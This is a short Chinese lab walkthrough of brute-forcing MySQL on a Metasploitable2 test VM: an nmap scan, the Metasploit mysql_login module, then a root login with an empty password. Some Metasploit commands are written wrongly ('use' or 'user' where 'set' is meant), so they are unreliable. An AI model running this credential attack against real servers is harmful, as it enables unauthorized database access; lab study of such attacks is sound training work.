MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。 官网:https://www.mysql.com/
实验环境:
攻击机:kali linux
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129
攻击过程:
step1:探测
nmap 192.168.172.129
nmap -sV -p 3306 192.168.172.129
step2:爆破密码
启动msf
命令: use auxiliary/scanner/mysql/mysql_login
show options
use rhosts 192.168.172.129
use user_file /root/Desktop/usename.txt
user pass_file /root/Desktop/password.txt
exploit
爆破成功
用户名为:root密码为空
step3:登陆
命令:mysql -h 192.168.172.129 -u root
show databases; //查看数据库